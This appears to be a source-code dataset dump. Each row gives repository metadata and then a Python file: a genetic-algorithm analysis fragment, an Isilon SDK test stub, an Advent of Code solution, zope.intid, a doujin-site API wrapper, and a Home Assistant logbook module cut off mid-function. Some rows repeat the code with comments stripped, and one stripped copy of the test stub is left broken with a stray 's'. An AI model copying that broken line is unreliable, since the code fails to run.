mfunc.show_message(g, analysis_handle, "num_trials = " + \
str(num_trials) + "\n")
mfunc.show_message(g, analysis_handle, "path = " + \
str(pickle_dir) + "\n\n")
mfunc.show_message(g, analysis_handle, \
"Note the results will change slightly each time this runs.\n\n")
pickle_list = []
for file in os.listdir(pickle_dir):
if file.endswith(".bin"):
pickle_list.append(file)
assert len(pickle_list) == num_generations + 1
pickle_base_search = re.search(r'(log-.+\d\ds-pickle-)', pickle_list[0])
pickle_base = pickle_base_search.group(1)
winning_seeds = []
for pickle_num in range(num_generations + 1):
pickle_name = pickle_base + str(pickle_num) + ".bin"
pickle_path = pickle_dir + "/" + pickle_name
pickle_handle = open(pickle_path, "rb")
pickle_data = pickle.load(pickle_handle)
pickle_handle.close()
winning_seed = pickle_data[0]
winning_seeds.append(winning_seed)
# seed (generation 0) has a fitness of zero. This is
# reasonable, since the first seed is randomly generated
# and there is no earlier generation we can compare it to.
#
for new_seed_num in range(num_generations + 1):
# if this is the first seed, then its score is zero ...
if (new_seed_num == 0):
new_seed_score = 0
mfunc.show_message(g, analysis_handle,
str(new_seed_num) + "\t" + str(new_seed_score) + "\n")
# if this is not the first seed ...
else:
new_seed = winning_seeds[new_seed_num]
# initialize sum of scores
new_seed_score = 0
# compare all the old winners to new_seed
for old_seed_num in range(new_seed_num):
old_seed = winning_seeds[old_seed_num]
# new_score will range from 0 to 1
# - new_score is the fraction of the trials that
# are won by new_seed
[old_score, new_score] = mfunc.score_pair(g, \
old_seed, new_seed, width_factor, height_factor, \
time_factor, num_trials)
# increment the sum of scores, new_seed_score, by new_score
# - increment ranges from 0 to 1
new_seed_score = new_seed_score + new_score
# now new_seed_score ranges from 0 to new_seed_num
# - lets adjust new_seed_score to range from
# -new_seed_num to +new_seed_num
new_seed_score = (2 * new_seed_score) - new_seed_num
# write result to output file
mfunc.show_message(g, analysis_handle,
str(new_seed_num) + "\t" + str(new_seed_score) + "\n")
#
#
#
# Final message
#
mfunc.show_message(g, analysis_handle, "\nAnalysis complete.\n")
analysis_handle.close()
#
#
| true
| true
|
1c3e8801d5bccde77ea36af7560697732cf3da40
| 958
|
py
|
Python
|
isi_sdk_8_0_1/test/test_storagepool_storagepool.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_0_1/test/test_storagepool_storagepool.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_0_1/test/test_storagepool_storagepool.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.storagepool_storagepool import StoragepoolStoragepool # noqa: E501
from isi_sdk_8_0_1.rest import ApiException
class TestStoragepoolStoragepool(unittest.TestCase):
"""StoragepoolStoragepool unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testStoragepoolStoragepool(self):
"""Test StoragepoolStoragepool"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0_1.models.storagepool_storagepool.StoragepoolStoragepool() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 23.365854
| 101
| 0.722338
|
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.storagepool_storagepool import StoragepoolStoragepool
from isi_sdk_8_0_1.rest import ApiException
class TestStoragepoolStoragepool(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testStoragepoolStoragepool(self):
s
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c3e883ab8dca08529839fc3dda5a2a6b5a432d2
| 3,389
|
py
|
Python
|
day3/solution.py
|
GeertLitjens/advent-of-code-2021
|
4a4f2cfddbd7aeb839498fb4e7a916e1b429b590
|
[
"Apache-2.0"
] | 10
|
2021-12-14T19:11:54.000Z
|
2022-02-28T13:44:07.000Z
|
day3/solution.py
|
GeertLitjens/advent-of-code-2021
|
4a4f2cfddbd7aeb839498fb4e7a916e1b429b590
|
[
"Apache-2.0"
] | null | null | null |
day3/solution.py
|
GeertLitjens/advent-of-code-2021
|
4a4f2cfddbd7aeb839498fb4e7a916e1b429b590
|
[
"Apache-2.0"
] | null | null | null |
"""
This day was slightly more challenging. Initially, I thought I might need to apply some binary arithmetic to solve
this problem, however, in the end this was not needed. I did decide to use numpy for fast and easy handling of arrays.
Potentially there is a smarter/faster/code-efficient solution that I didn't think of, but what I came up with works, so
that is the most important part.
"""
from utils import Solution
from typing import Any
import numpy as np
class DaySolution(Solution):
def __init__(self, day: int = 3, year: int = 2021) -> None:
super().__init__(day, year)
def _parse_data(self, input_data: str) -> Any:
"""
The parsing of the data was slightly different than previous days. First, I convert the dataset to a list of
lists containing string which I convert to a numpy array.
"""
string_list = [list(x) for x in input_data.split("\n") if x]
string_array = np.array(string_list)
return string_array
def _solve_part1(self, parsed_data: np.ndarray) -> Any:
"""
Because I converted the data to a numpy array, I can easily perform operations along any dimension.
Specifically, to identify the most common element for each bit, I take the ceil of the median across the rows.
The median itself in a binary setting will simply select the most common element, and the np.ceil resolves ties
by assigning them to 1. Then I use a list comprehension to invert the resultant string to get the least common
bits. Last, I convert the bit string to an integer by calling int with a base of 2.
"""
median = np.ceil(np.median(parsed_data.astype("int"), axis=0)).astype("int")
most_common = "".join(list(median.astype('str')))
least_common = "".join(['1' if i == '0' else '0' for i in most_common])
gamma = int(most_common, 2)
epsilon = int(least_common, 2)
return gamma * epsilon
def _solve_part2(self, parsed_data: np.ndarray) -> Any:
"""
Again, reading the actual task was the most challenging part here for me. Initially I assumed I could simply
use the most and least common bit strings from the previous example, however, then I realized that I had to do
it per bit because the bit strings needed to be calculated with respect to the remaining rows. The filtering on
the bit criteria is very easy to do in numpy using logical expression. I could very well imagine that this
problem can be solved more efficiently with a recurrent function or so, but my approach is still reasonably
fast (6 - 7 ms), so I think it is ok.
"""
filtered_data = parsed_data.copy().astype("int")
i = 0
while filtered_data.shape[0] > 1:
el = int(np.ceil(np.median(filtered_data[:, i])))
filtered_data = filtered_data[filtered_data[:, i] == el]
i += 1
og_rating = int("".join(filtered_data[0].astype("str")), 2)
filtered_data = parsed_data.copy().astype("int")
i = 0
while filtered_data.shape[0] > 1:
el = int(np.abs(np.median(filtered_data[:, i]) - 1))
filtered_data = filtered_data[filtered_data[:, i] == el]
i += 1
co_rating = int("".join(filtered_data[0].astype("str")), 2)
return og_rating * co_rating
| 52.138462
| 119
| 0.660962
|
from utils import Solution
from typing import Any
import numpy as np
class DaySolution(Solution):
def __init__(self, day: int = 3, year: int = 2021) -> None:
super().__init__(day, year)
def _parse_data(self, input_data: str) -> Any:
string_list = [list(x) for x in input_data.split("\n") if x]
string_array = np.array(string_list)
return string_array
def _solve_part1(self, parsed_data: np.ndarray) -> Any:
median = np.ceil(np.median(parsed_data.astype("int"), axis=0)).astype("int")
most_common = "".join(list(median.astype('str')))
least_common = "".join(['1' if i == '0' else '0' for i in most_common])
gamma = int(most_common, 2)
epsilon = int(least_common, 2)
return gamma * epsilon
def _solve_part2(self, parsed_data: np.ndarray) -> Any:
filtered_data = parsed_data.copy().astype("int")
i = 0
while filtered_data.shape[0] > 1:
el = int(np.ceil(np.median(filtered_data[:, i])))
filtered_data = filtered_data[filtered_data[:, i] == el]
i += 1
og_rating = int("".join(filtered_data[0].astype("str")), 2)
filtered_data = parsed_data.copy().astype("int")
i = 0
while filtered_data.shape[0] > 1:
el = int(np.abs(np.median(filtered_data[:, i]) - 1))
filtered_data = filtered_data[filtered_data[:, i] == el]
i += 1
co_rating = int("".join(filtered_data[0].astype("str")), 2)
return og_rating * co_rating
| true
| true
|
1c3e88eeb6cbbc89bf3d8872735e281a4c5d0264
| 7,084
|
py
|
Python
|
src/zope/intid/__init__.py
|
zopefoundation/zope.intid
|
3ae7ac3232167ae6d54dd920ce7fd179ba128615
|
[
"ZPL-2.1"
] | null | null | null |
src/zope/intid/__init__.py
|
zopefoundation/zope.intid
|
3ae7ac3232167ae6d54dd920ce7fd179ba128615
|
[
"ZPL-2.1"
] | 10
|
2016-03-24T15:24:16.000Z
|
2021-03-19T11:38:48.000Z
|
src/zope/intid/__init__.py
|
zopefoundation/zope.intid
|
3ae7ac3232167ae6d54dd920ce7fd179ba128615
|
[
"ZPL-2.1"
] | 1
|
2015-04-03T09:06:50.000Z
|
2015-04-03T09:06:50.000Z
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Unique id utility.
This utility assigns unique integer ids to objects and allows lookups
by object and by id.
This functionality can be used in cataloging.
"""
import random
import BTrees
from persistent import Persistent
from zope.component import adapter, getAllUtilitiesRegisteredFor, handle
from zope.event import notify
from zope.interface import implementer
from zope.keyreference.interfaces import IKeyReference, NotYet
from zope.lifecycleevent.interfaces import IObjectAddedEvent
from zope.lifecycleevent.interfaces import IObjectRemovedEvent
from zope.location.interfaces import ILocation
from zope.location.interfaces import IContained
from zope.security.proxy import removeSecurityProxy
from zope.intid.interfaces import IIntIds, IIntIdEvent
from zope.intid.interfaces import IntIdAddedEvent, IntIdRemovedEvent
from zope.intid.interfaces import IntIdMissingError, IntIdsCorruptedError, ObjectMissingError
try:
# POSKeyError is a subclass of KeyError; in the cases where we
# catch KeyError for an item missing from a BTree, we still
# want to propagate this exception that indicates a corrupt database
# (as opposed to a corrupt IntIds)
from ZODB.POSException import POSKeyError as _POSKeyError
except ImportError: # pragma: no cover (we run tests with ZODB installed)
# In practice, ZODB will probably be installed. But if not,
# then POSKeyError can never be generated, so use a unique
# exception that we'll never catch.
class _POSKeyError(BaseException):
pass
@implementer(IIntIds, IContained)
class IntIds(Persistent):
"""This utility provides a two way mapping between objects and
integer ids.
IKeyReferences to objects are stored in the indexes.
"""
__parent__ = __name__ = None
_v_nextid = None
_randrange = random.randrange
family = BTrees.family32
def __init__(self, family=None):
if family is not None:
self.family = family
self.ids = self.family.OI.BTree()
self.refs = self.family.IO.BTree()
def __len__(self):
return len(self.ids)
def items(self):
return list(self.refs.items())
def __iter__(self):
return self.refs.iterkeys()
def getObject(self, id):
try:
return self.refs[id]()
except _POSKeyError:
raise
except KeyError:
raise ObjectMissingError(id)
def queryObject(self, id, default=None):
r = self.refs.get(id)
if r is not None:
return r()
return default
def getId(self, ob):
try:
key = IKeyReference(ob)
except (NotYet, TypeError, ValueError):
raise IntIdMissingError(ob)
try:
return self.ids[key]
except _POSKeyError:
raise
except KeyError:
raise IntIdMissingError(ob)
def queryId(self, ob, default=None):
try:
return self.getId(ob)
except _POSKeyError:
raise
except KeyError:
return default
def _generateId(self):
"""Generate an id which is not yet taken.
This tries to allocate sequential ids so they fall into the
same BTree bucket, and randomizes if it stumbles upon a
used one.
"""
nextid = getattr(self, '_v_nextid', None)
while True:
if nextid is None:
nextid = self._randrange(0, self.family.maxint)
uid = nextid
if uid not in self.refs:
nextid += 1
if nextid > self.family.maxint:
nextid = None
self._v_nextid = nextid
return uid
nextid = None
def register(self, ob):
# Note that we'll still need to keep this proxy removal.
ob = removeSecurityProxy(ob)
key = IKeyReference(ob)
if key in self.ids:
return self.ids[key]
uid = self._generateId()
self.refs[uid] = key
self.ids[key] = uid
return uid
def unregister(self, ob):
# Note that we'll still need to keep this proxy removal.
ob = removeSecurityProxy(ob)
key = IKeyReference(ob, None)
if key is None:
return
try:
uid = self.ids[key]
except _POSKeyError:
raise
except KeyError:
raise IntIdMissingError(ob)
try:
del self.refs[uid]
except _POSKeyError:
raise
except KeyError:
# It was in self.ids, but not self.refs. Something is corrupted.
# We've always let this KeyError propagate, before cleaning up self.ids,
# meaning that getId(ob) will continue to work, but getObject(uid) will not.
raise IntIdsCorruptedError(ob, uid)
del self.ids[key]
def _utilities_and_key(ob):
utilities = tuple(getAllUtilitiesRegisteredFor(IIntIds))
return utilities, IKeyReference(ob, None) if utilities else None
@adapter(ILocation, IObjectRemovedEvent)
def removeIntIdSubscriber(ob, event):
"""A subscriber to ObjectRemovedEvent
Removes the unique ids registered for the object in all the unique
id utilities.
"""
utilities, key = _utilities_and_key(ob)
if not utilities or key is None:
# Unregister only objects that adapt to key reference
return
# Notify the catalogs that this object is about to be removed.
notify(IntIdRemovedEvent(ob, event))
for utility in utilities:
try:
utility.unregister(key)
except KeyError:
# Silently ignoring all kinds corruption here
pass
@adapter(ILocation, IObjectAddedEvent)
def addIntIdSubscriber(ob, event):
"""A subscriber to ObjectAddedEvent
Registers the object added in all unique id utilities and fires
an event for the catalogs.
"""
utilities, key = _utilities_and_key(ob)
if not utilities or key is None:
# Register only objects that adapt to key reference
return
idmap = {}
for utility in utilities:
idmap[utility] = utility.register(key)
# Notify the catalogs that this object was added.
notify(IntIdAddedEvent(ob, event, idmap))
@adapter(IIntIdEvent)
def intIdEventNotify(event):
"""Event subscriber to dispatch IntIdEvent to interested adapters."""
handle(event.object, event)
| 32.2
| 93
| 0.644975
| true
| true
|
|
1c3e89df476a8f3325bd09f766c6144661f65418
| 8,121
|
py
|
Python
|
NHentai/nhentai.py
|
AlexandreSenpai/NHentai-API
|
d209b6f1c9bb0a01c605929ce91b1fd360811afb
|
[
"MIT"
] | 33
|
2020-07-12T04:00:05.000Z
|
2022-03-27T12:50:57.000Z
|
NHentai/nhentai.py
|
AlexandreSenpai/NHentai-API
|
d209b6f1c9bb0a01c605929ce91b1fd360811afb
|
[
"MIT"
] | 16
|
2020-07-24T14:37:11.000Z
|
2022-03-06T01:57:02.000Z
|
NHentai/nhentai.py
|
AlexandreSenpai/NHentai-API
|
d209b6f1c9bb0a01c605929ce91b1fd360811afb
|
[
"MIT"
] | 14
|
2020-07-09T18:42:13.000Z
|
2022-03-11T13:30:06.000Z
|
import logging
from typing import Optional, Union
from urllib.parse import urljoin
from .utils.cache import Cache
from .base_wrapper import BaseWrapper
from .entities.doujin import Doujin, DoujinThumbnail
from .entities.page import (Page,
SearchPage,
TagListPage,
GroupListPage,
CharacterListPage,
ArtistListPage,
PopularPage)
from .entities.links import CharacterLink
from .entities.options import Sort
class NHentai(BaseWrapper):
@Cache(max_age_seconds=3600, max_size=1000, cache_key_position=1, cache_key_name='id').cache
def get_doujin(self, id: str) -> Doujin:
"""This method fetches a doujin information based on id.
Args:
id:
Id of the target doujin.
Returns:
Doujin:
dataclass with the doujin information within.
You can access the dataclasses informations at `entities` package.
"""
print(f'INFO::Retrieving doujin with id {id}')
id = str(id)
if not id.isnumeric() or id[0] == '0':
print('ERROR::Maybe you mistyped the doujin id or it doesnt exists.')
return None
SOUP = self._fetch(urljoin(self._API_URL, f'gallery/{id}'), is_json=True)
if SOUP.get('error'):
print('ERROR::Maybe you mistyped the doujin id or it doesnt exists.')
return None
print(f'INFO::Sucessfully retrieved doujin {id}')
return Doujin.from_json(SOUP)
@Cache(max_age_seconds=3600, max_size=15, cache_key_position=1, cache_key_name='page').cache
def get_pages(self, page: int) -> Page:
"""This method paginates through the homepage of NHentai and returns the doujins.
Args:
page:
number of the pagination page.
Returns:
HomePage:
dataclass with a list of DoujinThumbnail.
You can access the dataclasses informations at `entities` package.
"""
print(f'INFO::Fetching page {page}')
SOUP = self._fetch(urljoin(self._API_URL, f'galleries/all?page={page}'), is_json=True)
DOUJINS = [DoujinThumbnail.from_json(json_obj) for json_obj in SOUP.get('result')]
PAGES = SOUP.get('num_pages')
PER_PAGE = SOUP.get('per_page')
TOTAL_RESULTS = int(PAGES) * int(PER_PAGE)
return Page(doujins=DOUJINS,
total_results=TOTAL_RESULTS,
total_pages=PAGES,
per_page=PER_PAGE,
page=page)
def get_random(self) -> Doujin:
"""This method retrieves a random doujin.
Args:
Returns:
Doujin:
dataclass with the doujin information within.
You can access the dataclasses informations at `entities` package.
"""
SOUP = self._fetch(f'/random/')
id = SOUP.find('h3', id='gallery_id').text.replace('#', '')
doujin: Doujin = self.get_doujin(id=id)
return doujin
def search(self, query: str, page: Optional[int]=1, sort: Optional[Sort]=Sort.RECENT) -> Union[SearchPage, Doujin]:
"""This method retrieves the search page based on a query.
Args:
query str:
searchable term string. Ex: houshou marine, boa hancock, naruto
sort str:
doujin sort order
page int:
number of the page with results
Returns:
SearchPage:
dataclass with a list of DoujinThumbnail.
You can access the dataclasses informations at `entities` package.
"""
if query.isnumeric():
any_doujin: Doujin = self.get_doujin(id=query)
if any_doujin is not None:
return any_doujin
sort = sort.value if isinstance(sort, Sort) else sort
params = {'query': query, 'page': page, 'sort': sort} if sort is not None else {'query': query, 'page': page}
SOUP = self._fetch(urljoin(self._API_URL, f'galleries/search'), params=params, is_json=True)
DOUJINS = [Doujin.from_json(json_object=doujin) for doujin in SOUP.get('result')]
return SearchPage(query=query,
sort=sort,
total_results=SOUP.get('num_pages')*SOUP.get('per_page'),
total_pages=SOUP.get('num_pages'),
doujins=DOUJINS)
@Cache(max_age_seconds=3600, max_size=15, cache_key_position=1, cache_key_name='page').cache
def get_characters(self, page: int) -> CharacterListPage:
"""This method retrieves a list of characters that are available on NHentai site.
Args:
page:
number of the pagination page.
Returns:
CharacterListPage:
dataclass with the character list within.
You can access the dataclasses informations at `entities` package.
"""
SOUP = self._fetch(f'/characters/?page={page}')
pagination_section = SOUP.find('section', class_='pagination')
TOTAL_PAGES = int(pagination_section.find('a', class_='last')['href'].split('=')[-1])
CHARACTERS = []
character_list_section = SOUP.find('div', class_='container')
section = character_list_section.find_all('section')
for link in section:
for character in link:
try:
TITLE = character.find('span', class_='name').text
CHARACTERS.append(CharacterLink(section=TITLE[0] if not TITLE[0].isnumeric() else '#',
title=TITLE,
url=character['href'],
total_entries=int(character.find('span', class_='count').text)))
except Exception as err:
logging.error(err)
return CharacterListPage(page=page,
total_pages=int(TOTAL_PAGES),
characters=CHARACTERS)
def get_popular_now(self):
"""This method retrieves a list of the current most popular doujins.
Args:
Returns:
PopularPage:
dataclass with the current popular doujin list within.
You can access the dataclasses informations at `entities` package.
"""
SOUP = self._fetch(f'/')
popular_section = SOUP.find('div', class_='index-popular')
DOUJINS = []
for item in popular_section.find_all('div', class_='gallery'):
DOUJIN_ID = item.find('a', class_='cover')['href'].split('/')[2]
POPULAR_DOUJIN = self.get_doujin(DOUJIN_ID)
if POPULAR_DOUJIN is not None:
DOUJINS.append(DoujinThumbnail(id=POPULAR_DOUJIN.id,
media_id=POPULAR_DOUJIN.media_id,
title=POPULAR_DOUJIN.title,
languages=POPULAR_DOUJIN.languages,
cover=POPULAR_DOUJIN.cover,
url=urljoin(self._BASE_URL, f"/g/{POPULAR_DOUJIN.id}"),
tags=POPULAR_DOUJIN.tags))
return PopularPage(doujins=DOUJINS,
total_doujins=len(DOUJINS))
def get_home_page():
raise NotImplementedError
def get_artists(self, page: int = 1) -> ArtistListPage:
raise NotImplementedError
def get_tags(self, page: int = 1) -> TagListPage:
raise NotImplementedError
def get_groups(self, page: int = 1) -> GroupListPage:
raise NotImplementedError
| 36.746606
| 119
| 0.550794
|
import logging
from typing import Optional, Union
from urllib.parse import urljoin
from .utils.cache import Cache
from .base_wrapper import BaseWrapper
from .entities.doujin import Doujin, DoujinThumbnail
from .entities.page import (Page,
SearchPage,
TagListPage,
GroupListPage,
CharacterListPage,
ArtistListPage,
PopularPage)
from .entities.links import CharacterLink
from .entities.options import Sort
class NHentai(BaseWrapper):
@Cache(max_age_seconds=3600, max_size=1000, cache_key_position=1, cache_key_name='id').cache
def get_doujin(self, id: str) -> Doujin:
print(f'INFO::Retrieving doujin with id {id}')
id = str(id)
if not id.isnumeric() or id[0] == '0':
print('ERROR::Maybe you mistyped the doujin id or it doesnt exists.')
return None
SOUP = self._fetch(urljoin(self._API_URL, f'gallery/{id}'), is_json=True)
if SOUP.get('error'):
print('ERROR::Maybe you mistyped the doujin id or it doesnt exists.')
return None
print(f'INFO::Sucessfully retrieved doujin {id}')
return Doujin.from_json(SOUP)
@Cache(max_age_seconds=3600, max_size=15, cache_key_position=1, cache_key_name='page').cache
def get_pages(self, page: int) -> Page:
print(f'INFO::Fetching page {page}')
SOUP = self._fetch(urljoin(self._API_URL, f'galleries/all?page={page}'), is_json=True)
DOUJINS = [DoujinThumbnail.from_json(json_obj) for json_obj in SOUP.get('result')]
PAGES = SOUP.get('num_pages')
PER_PAGE = SOUP.get('per_page')
TOTAL_RESULTS = int(PAGES) * int(PER_PAGE)
return Page(doujins=DOUJINS,
total_results=TOTAL_RESULTS,
total_pages=PAGES,
per_page=PER_PAGE,
page=page)
def get_random(self) -> Doujin:
SOUP = self._fetch(f'/random/')
id = SOUP.find('h3', id='gallery_id').text.replace('#', '')
doujin: Doujin = self.get_doujin(id=id)
return doujin
def search(self, query: str, page: Optional[int]=1, sort: Optional[Sort]=Sort.RECENT) -> Union[SearchPage, Doujin]:
if query.isnumeric():
any_doujin: Doujin = self.get_doujin(id=query)
if any_doujin is not None:
return any_doujin
sort = sort.value if isinstance(sort, Sort) else sort
params = {'query': query, 'page': page, 'sort': sort} if sort is not None else {'query': query, 'page': page}
SOUP = self._fetch(urljoin(self._API_URL, f'galleries/search'), params=params, is_json=True)
DOUJINS = [Doujin.from_json(json_object=doujin) for doujin in SOUP.get('result')]
return SearchPage(query=query,
sort=sort,
total_results=SOUP.get('num_pages')*SOUP.get('per_page'),
total_pages=SOUP.get('num_pages'),
doujins=DOUJINS)
@Cache(max_age_seconds=3600, max_size=15, cache_key_position=1, cache_key_name='page').cache
def get_characters(self, page: int) -> CharacterListPage:
SOUP = self._fetch(f'/characters/?page={page}')
pagination_section = SOUP.find('section', class_='pagination')
TOTAL_PAGES = int(pagination_section.find('a', class_='last')['href'].split('=')[-1])
CHARACTERS = []
character_list_section = SOUP.find('div', class_='container')
section = character_list_section.find_all('section')
for link in section:
for character in link:
try:
TITLE = character.find('span', class_='name').text
CHARACTERS.append(CharacterLink(section=TITLE[0] if not TITLE[0].isnumeric() else '#',
title=TITLE,
url=character['href'],
total_entries=int(character.find('span', class_='count').text)))
except Exception as err:
logging.error(err)
return CharacterListPage(page=page,
total_pages=int(TOTAL_PAGES),
characters=CHARACTERS)
def get_popular_now(self):
SOUP = self._fetch(f'/')
popular_section = SOUP.find('div', class_='index-popular')
DOUJINS = []
for item in popular_section.find_all('div', class_='gallery'):
DOUJIN_ID = item.find('a', class_='cover')['href'].split('/')[2]
POPULAR_DOUJIN = self.get_doujin(DOUJIN_ID)
if POPULAR_DOUJIN is not None:
DOUJINS.append(DoujinThumbnail(id=POPULAR_DOUJIN.id,
media_id=POPULAR_DOUJIN.media_id,
title=POPULAR_DOUJIN.title,
languages=POPULAR_DOUJIN.languages,
cover=POPULAR_DOUJIN.cover,
url=urljoin(self._BASE_URL, f"/g/{POPULAR_DOUJIN.id}"),
tags=POPULAR_DOUJIN.tags))
return PopularPage(doujins=DOUJINS,
total_doujins=len(DOUJINS))
def get_home_page():
raise NotImplementedError
def get_artists(self, page: int = 1) -> ArtistListPage:
raise NotImplementedError
def get_tags(self, page: int = 1) -> TagListPage:
raise NotImplementedError
def get_groups(self, page: int = 1) -> GroupListPage:
raise NotImplementedError
| true
| true
|
1c3e8de387bbb312c047ea617eb3ac0f5779e29a
| 377
|
py
|
Python
|
WtFrac.py
|
Lam3name/TKP4120
|
d433d45841adea50b323d910240a9537e9475b7f
|
[
"CC0-1.0"
] | null | null | null |
WtFrac.py
|
Lam3name/TKP4120
|
d433d45841adea50b323d910240a9537e9475b7f
|
[
"CC0-1.0"
] | null | null | null |
WtFrac.py
|
Lam3name/TKP4120
|
d433d45841adea50b323d910240a9537e9475b7f
|
[
"CC0-1.0"
] | null | null | null |
import scipy.optimize
import numpy as np
import matplotlib.pyplot as plt
import constants as con
def WtFracCO2(alpha):
return ((con.Mw[0])*alpha)/((1+(0.7/0.3))*con.MwMEA)
def WtFracToAbsMol(tot, percent, molarMass):
return((tot*percent)/molarMass*1000) # mol/s
def fracMolToFracWt(tot, percent, molarmass):
return(((tot*percent)*molarmass)/1000) #kg/s
| 26.928571
| 56
| 0.70557
|
import scipy.optimize
import numpy as np
import matplotlib.pyplot as plt
import constants as con
def WtFracCO2(alpha):
return ((con.Mw[0])*alpha)/((1+(0.7/0.3))*con.MwMEA)
def WtFracToAbsMol(tot, percent, molarMass):
return((tot*percent)/molarMass*1000)
def fracMolToFracWt(tot, percent, molarmass):
return(((tot*percent)*molarmass)/1000)
| true
| true
|
1c3e8ed1f19607ace9274bfadcb5a2b0fc836964
| 13,931
|
py
|
Python
|
homeassistant/components/logbook.py
|
GotoCode/home-assistant
|
7e39a5c4d50cf5754f5f32a84870ca57a5778b02
|
[
"Apache-2.0"
] | 11
|
2017-09-25T13:11:33.000Z
|
2020-05-16T21:54:28.000Z
|
homeassistant/components/logbook.py
|
GotoCode/home-assistant
|
7e39a5c4d50cf5754f5f32a84870ca57a5778b02
|
[
"Apache-2.0"
] | 125
|
2018-12-11T07:31:20.000Z
|
2021-07-27T08:20:03.000Z
|
homeassistant/components/logbook.py
|
y1ngyang/home-assistant
|
7e39a5c4d50cf5754f5f32a84870ca57a5778b02
|
[
"Apache-2.0"
] | 3
|
2018-05-22T18:52:01.000Z
|
2019-07-18T21:30:45.000Z
|
"""
Event parser and human readable log generator.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/logbook/
"""
import asyncio
import logging
from datetime import timedelta
from itertools import groupby
import voluptuous as vol
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
from homeassistant.components import sun
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP, EVENT_STATE_CHANGED,
STATE_NOT_HOME, STATE_OFF, STATE_ON, ATTR_HIDDEN, HTTP_BAD_REQUEST,
EVENT_LOGBOOK_ENTRY)
from homeassistant.core import State, split_entity_id, DOMAIN as HA_DOMAIN
DOMAIN = 'logbook'
DEPENDENCIES = ['recorder', 'frontend']
_LOGGER = logging.getLogger(__name__)
CONF_EXCLUDE = 'exclude'
CONF_INCLUDE = 'include'
CONF_ENTITIES = 'entities'
CONF_DOMAINS = 'domains'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
CONF_EXCLUDE: vol.Schema({
vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,
vol.Optional(CONF_DOMAINS, default=[]): vol.All(cv.ensure_list,
[cv.string])
}),
CONF_INCLUDE: vol.Schema({
vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,
vol.Optional(CONF_DOMAINS, default=[]): vol.All(cv.ensure_list,
[cv.string])
})
}),
}, extra=vol.ALLOW_EXTRA)
ALL_EVENT_TYPES = [
EVENT_STATE_CHANGED, EVENT_LOGBOOK_ENTRY,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP
]
GROUP_BY_MINUTES = 15
CONTINUOUS_DOMAINS = ['proximity', 'sensor']
ATTR_NAME = 'name'
ATTR_MESSAGE = 'message'
ATTR_DOMAIN = 'domain'
ATTR_ENTITY_ID = 'entity_id'
LOG_MESSAGE_SCHEMA = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_DOMAIN): cv.slug,
vol.Optional(ATTR_ENTITY_ID): cv.entity_id,
})
def log_entry(hass, name, message, domain=None, entity_id=None):
"""Add an entry to the logbook."""
hass.add_job(async_log_entry, hass, name, message, domain, entity_id)
def async_log_entry(hass, name, message, domain=None, entity_id=None):
"""Add an entry to the logbook."""
data = {
ATTR_NAME: name,
ATTR_MESSAGE: message
}
if domain is not None:
data[ATTR_DOMAIN] = domain
if entity_id is not None:
data[ATTR_ENTITY_ID] = entity_id
hass.bus.async_fire(EVENT_LOGBOOK_ENTRY, data)
@asyncio.coroutine
def setup(hass, config):
"""Listen for download events to download files."""
@callback
def log_message(service):
"""Handle sending notification message service calls."""
message = service.data[ATTR_MESSAGE]
name = service.data[ATTR_NAME]
domain = service.data.get(ATTR_DOMAIN)
entity_id = service.data.get(ATTR_ENTITY_ID)
message.hass = hass
message = message.async_render()
async_log_entry(hass, name, message, domain, entity_id)
hass.http.register_view(LogbookView(config.get(DOMAIN, {})))
yield from hass.components.frontend.async_register_built_in_panel(
'logbook', 'logbook', 'mdi:format-list-bulleted-type')
hass.services.async_register(
DOMAIN, 'log', log_message, schema=LOG_MESSAGE_SCHEMA)
return True
class LogbookView(HomeAssistantView):
"""Handle logbook view requests."""
url = '/api/logbook'
name = 'api:logbook'
extra_urls = ['/api/logbook/{datetime}']
def __init__(self, config):
"""Initialize the logbook view."""
self.config = config
@asyncio.coroutine
def get(self, request, datetime=None):
"""Retrieve logbook entries."""
if datetime:
datetime = dt_util.parse_datetime(datetime)
if datetime is None:
return self.json_message('Invalid datetime', HTTP_BAD_REQUEST)
else:
